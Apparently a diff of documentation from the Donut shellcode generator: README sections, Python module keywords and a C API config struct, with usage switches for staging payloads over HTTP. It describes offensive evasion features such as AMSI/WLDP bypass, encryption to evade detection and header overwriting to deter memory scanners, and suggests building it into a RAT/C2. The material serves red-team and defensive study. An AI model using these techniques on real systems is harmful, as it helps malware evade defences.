207 * donut.exe: The compiled payload generator as an EXE
208 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
209 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
210 * setup.py: The setup file for installing Donut as a Pip Python3 module.
211 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
212 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
213 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
214 * payload/payload.c: Main file for the shellcode.
215 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
216 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
217 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
218 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
219 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
220 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
221 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
222 * payload/http_client.c: Downloads a module from remote staging server into memory.
223 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
224 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
225 * payload/inject.exe: The compiled C shellcode injector
226 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
227 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
228 * payload/runsc.exe: The compiled C shellcode runner
229 * payload/exe2h/exe2h.c: Source code for exe2h
230 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
231 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
232 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
233
234 # Subprojects
235
236 There are three companion projects provided with donut:
237
238 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
239 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
240 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
241 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
242
243 # Project plan
244
245 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
246 * Create a C# version of the generator.
247 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
248 * Add support for HTTP proxies.
249 ~~* Find ways to simplify the shellcode if possible.~~
250 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
251 * ~~Dynamic Calls to DLL functions.~~
252 * Handle the ProcessExit event from AppDomain using unmanaged code.
0 [![Issues](https://img.shields.io/github/issues/thewover/donut)](https://github.com/TheWover/donut/issues)
1 [![Contributors](https://img.shields.io/github/contributors/thewover/donut)](https://github.com/TheWover/donut/graphs/contributors)
2 [![Stars](https://img.shields.io/github/stars/thewover/donut)](https://github.com/TheWover/donut/stargazers)
3 [![Forks](https://img.shields.io/github/forks/thewover/donut)](https://github.com/TheWover/donut/network/members)
4 [![License](https://img.shields.io/github/license/thewover/donut)](https://github.com/TheWover/donut/blob/master/LICENSE)
5 [![Chat](https://img.shields.io/badge/chat-%23donut-orange)](https://bloodhoundgang.herokuapp.com/)
6 [![Github All Releases](https://img.shields.io/github/downloads/thewover/donut/total.svg)](http://www.somsubhra.com/github-release-stats/?username=thewover&repository=donut)
7 [![Twitter URL](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https://github.com/TheWover/donut&text=%23Donut+An+open-source+shellcode+generator+that+supports+in%2Dmemory+execution+of+VBS%2FJS%2FEXE%2FDLL+files:+https://github.com/TheWover/donut)
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut_logo_white.jpg?raw=true "Donut Logo")
10
11 <p>Current version: <a href="https://thewover.github.io/TBD/">v0.9.3</a> <em>please submit issues and requests for v1.0 release</em></p>
12
13 <h2>Table of contents</h2>
14
15 <ol>
16 <li><a href="#intro">Introduction</a></li>
17 <li><a href="#how">How It Works</a></li>
18 <li><a href="#build">Building</a></li>
19 <li><a href="#usage">Usage</a></li>
20 <li><a href="#subproj">Subprojects</a></li>
21 <li><a href="#dev">Developing with Donut</a></li>
22 <li><a href="#qad">Questions and Discussions</a></li>
23 <li><a href="#disclaimer">Disclaimer</a></li>
24 </ol>
25
26 <h2 id="intro">1. Introduction</h2>
27
28 <p><strong>Donut</strong> is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself. The module is optionally encrypted using the <a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a> block cipher and a 128-bit randomly generated key. After the file is loaded and executed in memory, the original reference is erased to deter memory scanners. The generator and loader support the following features:</p>
29
30 <ul>
31 <li>Compression of input files with aPLib and LZNT1, Xpress, Xpress Huffman via RtlCompressBuffer.</li>
32 <li>Using entropy for API hashes and generation of strings.</li>
33 <li>128-bit symmetric encryption of files.</li>
34 <li>Patching Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP).</li>
35 <li>Patching command line for EXE files.</li>
36 <li>Patching exit-related API to avoid termination of host process.</li>
37 <li>Multiple output formats: C, Ruby, Python, PowerShell, Base64, C#, Hexadecimal.</li>
38 </ul>
39
40 <p>There are dynamic and static libraries for both Linux and Windows that can be integrated into your own projects. There's also a python module which you can read more about in <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
41
42 <h2 id="how">2. How It Works</h2>
43
44 <p>Donut contains individual loaders for each supported file type. For dotNET EXE/DLL assemblies, Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. Once the CLR is loaded into the host process, a new Application Domain is created to allow for running Assemblies in disposable AppDomains. When the AppDomain is ready, the dotNET Assembly is loaded via the AppDomain.Load_3 method. Finally, the Entry Point for EXEs or public method for DLLs specified by the user is invoked with any additional parameters. Refer to MSDN for documentation on the <a href=" https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces">Unmanaged CLR Hosting API.</a> For a standalone example of a CLR Host, refer to <a href="https://github.com/TheWover/donut/blob/master/DonutTest/rundotnet.cpp">code here.</a></p>
45
46 <p>VBScript and JScript files are executed using the IActiveScript interface. There's also minimal support for some of the methods provided by the Windows Script Host (wscript/cscript). For a standalone example, refer to <a href="https://gist.github.com/odzhan/d18145b9538a3653be2f9a580b53b063">code here.</a> For a more detailed description, read: <a href="https://modexp.wordpress.com/2019/07/21/inmem-exec-script/">In-Memory Execution of JavaScript, VBScript, JScript and XSL</a></p>
47
48 <p>Unmanaged or native EXE/DLL files are executed using a custom PE loader with support for Delayed Imports, TLS and patching the command line. Only files with relocation information are supported. Read <a href="https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/">In-Memory Execution of DLL</a> for more information.</p>
49
50 <p>The loader can disable AMSI and WLDP to help evade detection of malicious files executed in-memory. For more information, read <a href="https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/">How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code</a>. It also supports decompression of files in memory using aPLib or the RtlDecompressBuffer API. Read <a href="https://modexp.wordpress.com/2019/12/08/shellcode-compression/">Data Compression</a> for more information.</p>
51
52 <p>By default, the loader will overwrite the PE headers of unmanaged PEs (from the base address to `IMAGE_OPTIONAL_HEADER.SizeOfHeaders`). If no decoy module is used (module overloading), then the PE headers will be zeroed. If a decoy module is used, the PE headers of the decoy module will be used to overwrite those of the payload module. This is to deter detection by comparing the PE headers of modules in memory with the file backing them on disk. The user may request that all PE headers be preserved in their original state. This is helpful for scenarios when the payload module needs to access its PE headers, such as when looking up embedded PE resources.</p>
53
54 <p>For a detailed walkthrough using the generator and how Donut affects tradecraft, read <a href="https://thewover.github.io/Introducing-Donut/">Donut - Injecting .NET Assemblies as Shellcode</a>. For more information about the loader, read <a href="https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/">Loading .NET Assemblies From Memory</a>.</p>
55
56 <p>Those who wish to know more about the internals should refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">Developer notes.</a></p>
57
58 <h2 id="build">3. Building</h2>
59
60 <p>There are two types of build. If you want to debug Donut, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">documentation here</a>. If not, continue reading for the release build.</p>
61
62 <h3><strong>Clone</strong></h3>
63
64 <p>From a Windows command prompt or Linux terminal, clone the repository.</p>
65
66 <pre>
67 git clone http://github.com/thewover/donut.git
68 </pre>
69
70 <p>The next step depends on your operating system and what compiler you decide to use. Currently, the generator and loader template for Donut can be compiled successfully with both Microsoft Visual Studio 2019 (Native Tools Command Prompt for VS 2019) and MingGW-64. To use the libraries in your own C/C++ project, please refer to the <a href="https://github.com/TheWover/donut/tree/master/examples">examples provided here.</a></p>
71
72 <h4><strong>Windows</strong></h4>
73
74 <p>To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:</p>
75
76 <pre>
77 nmake -f Makefile.msvc
78 </pre>
79
80 <p>To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:</p>
81
82 <pre>
83 make -f Makefile.mingw
84 </pre>
85
86 <h4><strong>Linux</strong></h4>
87
88 <p>To generate the dynamic library donut.so, the static library donut.a and the generator donut. Change to the directory where you cloned the Donut repository and simply type make.</p>
89
90 <h3>Python Module</h3>
91
92 <p>Donut can be installed and used as a Python module. To install from source requires pip for Python3. First, ensure older versions of donut-shellcode are not installed by issuing the following command on Linux terminal or Microsoft Visual Studio command prompt.</p>
93
94 <pre>
95 pip3 uninstall donut-shellcode
96 </pre>
97
98 <p>After you confirm older versions are no longer installed, issue the following command.</p>
99
100 <pre>
101 pip3 install .
102 </pre>
103
104 <p>You may also install Donut as a Python module by grabbing it from the PyPi repository.</p>
105
106 <pre>
107 pip3 install donut-shellcode
108 </pre>
109
110 <p>For more information, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
111
112 <h3>Releases</h3>
113
114 <p>Tags have been provided for each release version of Donut that contain the compiled executables.</p>
115
116 <ul>
117 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.3">v0.9.3, TBD</a></li>
118 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.2">v0.9.2, Bear Claw</a></li>
119 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.1">v0.9.1, Apple Fritter</a></li>
120 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9">v0.9.0, Initial Release</a></li>
121 </ul>
122
123 <p>Currently, there are two other generators available.</p>
124
125 <ul>
126 <li><a href="https://github.com/n1xbyte/donutCS">C# generator by n1xbyte</a></li>
127 <li><a href="https://github.com/Binject/go-donut">Go generator by awgh</a></li>
128 </ul>
129
130 <h2 id="usage">4. Usage</h2>
131
132 <p>The following table lists switches supported by the command line version of the generator.</p>
133
134 <table border="1">
135 <tr>
136 <th>Switch</th>
137 <th>Argument</th>
138 <th>Description</th>
139 </tr>
140
141 <tr>
142 <td><strong>-a</strong></td>
143 <td><var>arch</var></td>
144 <td>Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).</td>
145 </tr>
146
147 <tr>
148 <td><strong>-b</strong></td>
149 <td><var>level</var></td>
150 <td>Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)</td>
151 </tr>
152
153 <tr>
154 <td><strong>-k</strong></td>
155 <td><var>headers</var></td>
156 <td>Preserve PE headers. 1=Overwrite (default), 2=Keep all</td>
157 </tr>
158
159 <tr>
160 <td><strong>-c</strong></td>
161 <td><var>class</var></td>
162 <td>Optional class name. (required for .NET DLL) Can also include namespace: e.g <em>namespace.class</em></td>
163 </tr>
164
165 <tr>
166 <td><strong>-d</strong></td>
167 <td><var>name</var></td>
168 <td>AppDomain name to create for .NET. If entropy is enabled, one will be generated randomly.</td>
169 </tr>
170
171 <tr>
172 <td><strong>-e</strong></td>
173 <td><var>level</var></td>
174 <td>Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default)</td>
175 </tr>
176
177 <tr>
178 <td><strong>-f</strong></td>
179 <td><var>format</var></td>
180 <td>The output format of loader saved to file. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal</td>
181 </tr>
182
183 <tr>
184 <td><strong>-m</strong></td>
185 <td><var>name</var></td>
186 <td>Optional method or function for DLL. (a method is required for .NET DLL)</td>
187 </tr>
188
189 <tr>
190 <td><strong>-n</strong></td>
191 <td><var>name</var></td>
192 <td>Module name for HTTP staging. If entropy is enabled, one is generated randomly.</td>
193 </tr>
194
195 <tr>
196 <td><strong>-o</strong></td>
197 <td><var>path</var></td>
198 <td>Specifies where Donut should save the loader. Default is "loader.bin" in the current directory.</td>
199 </tr>
200
201 <tr>
202 <td><strong>-p</strong></td>
203 <td><var>parameters</var></td>
204 <td>Optional parameters/command line inside quotations for DLL method/function or EXE.</td>
205 </tr>
206
207 <tr>
208 <td><strong>-r</strong></td>
209 <td><var>version</var></td>
210 <td>CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.</td>
211 </tr>
212
213 <tr>
214 <td><strong>-s</strong></td>
215 <td><var>server</var></td>
216 <td>URL for the HTTP server that will host a Donut module. Credentials may be provided in the following format: <pre>https://username:[email protected]/</pre></td>
217 </tr>
218
219 <tr>
220 <td><strong>-t</strong></td>
221 <td></td>
222 <td>Run the entrypoint of an unmanaged/native EXE as a thread and wait for thread to end.</td>
223 </tr>
224
225 <tr>
226 <td><strong>-w</strong></td>
227 <td></td>
228 <td>Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)</td>
229 </tr>
230
231 <tr>
232 <td><strong>-x</strong></td>
233 <td><var>option</var></td>
234 <td>Determines how the loader should exit. 1=exit thread (default), 2=exit process.</td>
235 </tr>
236
237 <tr>
238 <td><strong>-y</strong></td>
239 <td><var>addr</var></td>
240 <td>Creates a new thread for the loader and continues execution at the address of host process.</td>
241 </tr>
242
243 <tr>
244 <td><strong>-z</strong></td>
245 <td><var>engine</var></td>
246 <td>Pack/Compress the input file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman. Currently, the last three are only supported on Windows.</td>
247 </tr>
248 </table>
249
250 <h3 id="requirements">Payload Requirements</h2>
251
252 <p>There are some specific requirements that your payload must meet in order for Donut to successfully load it.</p>
253
254 <h3 id="requirements-dotnet">.NET Assemblies</h2>
255
256 <ul>
257 <li>The entry point method must only take strings as arguments, or take no arguments.</li>
258 <li>The entry point method must be marked as public and static.</li>
259 <li>The class containing the entry point method must be marked as public.</li>
260 <li>The Assembly must NOT be a Mixed Assembly (contain both managed and native code).</li>
261 <li>As such, the Assembly must NOT contain any Unmanaged Exports.</li>
262 </ul>
263
264 <h3 id="requirements-native">Native EXE/DLL</h2>
265
266 <ul>
267 <li>Binaries built with Cygwin are unsupported.</li>
268 </ul>
269
270 <p>Cygwin executables use initialization routines that expect the host process to be running from disk. If executing from memory, the host process will likely crash.</p>
271
272 <h3 id="requirements-dotnet">Unmanaged DLLs</h2>
273
274 <ul>
275 <li>A user-specified entry point method must only take a string as an argument, or take no arguments. We have provided an <a href="https://github.com/TheWover/donut/blob/master/DonutTest/dlltest.c/">example</a>.</li>
276 </ul>
277
278 <h2 id="subproj">5. Subprojects</h2>
279
280 <p>There are four companion projects provided with donut:</p>
281
282 <table border="1">
283 <tr>
284 <th>Tool</th>
285 <th>Description</th>
286 </tr>
287 <tr>
288 <td>DemoCreateProcess</td>
289 <td>A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.</td>
290 </tr>
291 <tr>
292 <td>DonutTest</td>
293 <td>A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.</td>
294 </tr>
295 <tr>
296 <td>ModuleMonitor</td>
297 <td>A proof-of-concept tool that detects CLR injection as it is done by tools such as Donut and Cobalt Strike's execute-assembly.</td>
298 </tr>
299 <tr>
300 <td>ProcessManager</td>
301 <td>A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. </td>
302 </tr>
303 </table>
304
305 <h2 id="dev">6. Developing with Donut</h2>
306
307 <p>You may want to add support for more types of payloads, change our feature set, or integrate Donut into your existing tooling. We have provided <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">developer documentation</a>. Additional features are left as exercises to the reader. Our suggestions:</p>
308
309 <ul>
310 <li>Add environmental keying.</li>
311 <li>Make Donut polymorphic by obfuscating the loader every time shellcode is generated.</li>
312 <li>Integrate Donut as a module into your favorite RAT/C2 Framework.</li>
313 </ul>
314
315 <h2 id="qad">7. Questions and Discussion</h2>
316
317 <p>If you have any questions or comments about Donut. Join the #Donut channel in the <a href="https://bloodhoundgang.herokuapp.com/">BloodHound Gang Slack</a></p>
318
319 <h2 id="disclaimer">8. Disclaimer</h2>
320
321 <p>We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection and in-memory loading through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.</p>
3434
3535 The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments.
3636
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS/XSL file to turn into shellcode.
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS file to turn into shellcode.
3838
3939 ```python
4040 import donut
4242 shellcode = donut.create(
4343 file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory
4444 url='http://127.0.0.1', # HTTP server that will host the donut module
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default)
46 bypass=3, # Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default)
46 bypass=3, # Bypass AMSI/WLDP : 1=none, 2=abort on fail, 3=continue on fail.(default)
4747 cls='namespace.class', # Optional class name. (required for .NET DLL)
4848 method='method', # Optional method or API name for DLL. (method is required for .NET DLL)
49 params='arg1,arg2', # Optional parameters or command line, separated by comma or semi-colon.
49 params='arg1 arg2', # Optional parameters or command line.
5050 runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available
5151 appdomain='name' # AppDomain name to create for .NET. Randomly generated by default.
5252 )
5353 ```
5454
55 ## Keywords
56
57 The following table lists key words for the create method.
58
59 <table>
60 <tr>
61 <th>Keyword</th>
62 <th>Type</th>
63 <th>Description</th>
64 </tr>
65 <tr>
66 <td>file</td>
67 <td>String</td>
68 <td>The path of file to execute in memory. VBS/JS/EXE/DLL files are supported.</td>
69 </tr>
70 <tr>
71 <td>arch</td>
72 <td>Integer</td>
73 <td>Indicates the type of assembly code to generate. 1=<code>DONUT_ARCH_X86</code> and 2=<code>DONUT_ARCH_X64</code> are self-explanatory. 3=<code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
74 </tr>
75 <tr>
76 <td>bypass</td>
77 <td>Integer</td>
78 <td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are 1=<code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. 2=<code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. 3=<code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
79 </tr>
80 <tr>
81 <td>compress</td>
82 <td>Integer</td>
83 <td>Indicates if the input file should be compressed. Available engines are 1=<code>DONUT_COMPRESS_NONE</code>, 2=<code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports 3=<code>DONUT_COMPRESS_LZNT1</code>, 4=<code>DONUT_COMPRESS_XPRESS</code> and 5=<code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
84 </tr>
85 <tr>
86 <td>entropy</td>
87 <td>Integer</td>
88 <td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are 1=<code>DONUT_ENTROPY_NONE</code>, 2=<code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and 3=<code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
89 </tr>
90 <tr>
91 <td>format</td>
92 <td>Integer</td>
93 <td>Specifies the output format for the shellcode loader. Supported formats are 1=<code>DONUT_FORMAT_BINARY</code>, 2=<code>DONUT_FORMAT_BASE64</code>, 3=<code>DONUT_FORMAT_RUBY</code>, 4=<code>DONUT_FORMAT_C</code>, 5=<code>DONUT_FORMAT_PYTHON</code>, 6=<code>DONUT_FORMAT_POWERSHELL</code>, 7=<code>DONUT_FORMAT_CSHARP</code> and 8=<code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
94 </tr>
95 <tr>
96 <td>exit_opt</td>
97 <td>Integer</td>
98 <td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Use 2=<code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.</td>
99 </tr>
100 <tr>
101 <td>thread</td>
102 <td>Integer</td>
103 <td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
104 </tr>
105 <tr>
106 <td>oep</td>
107 <td>String</td>
108 <td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
109 </tr>
110 <tr>
111 <td>output</td>
112 <td>String</td>
113 <td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
114 </tr>
115 <tr>
116 <td>runtime</td>
117 <td>String</td>
118 <td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
119 </tr>
120 <tr>
121 <td>appdomain</td>
122 <td>String</td>
123 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
124 </tr>
125 <tr>
126 <td>cls</td>
127 <td>String</td>
128 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</td>
129 </tr>
130 <tr>
131 <td>method</td>
132 <td>String</td>
133 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
134 </tr>
135 <tr>
136 <td>params</td>
137 <td>String</td>
138 <td>List of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
139 </tr>
140 <tr>
141 <td>unicode</td>
142 <td>Integer</td>
143 <td>By default, the <code>params</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
144 </tr>
145 <tr>
146 <td>url or server</td>
147 <td>String</td>
148 <td>If the instance type is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
149 </tr>
150 <tr>
151 <td>modname</td>
152 <td>String</td>
153 <td>If the type is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
154 </tr>
155 </table>
156
55157 ## Author
56158
57159 The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)
+0
-511
docs/api.html
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
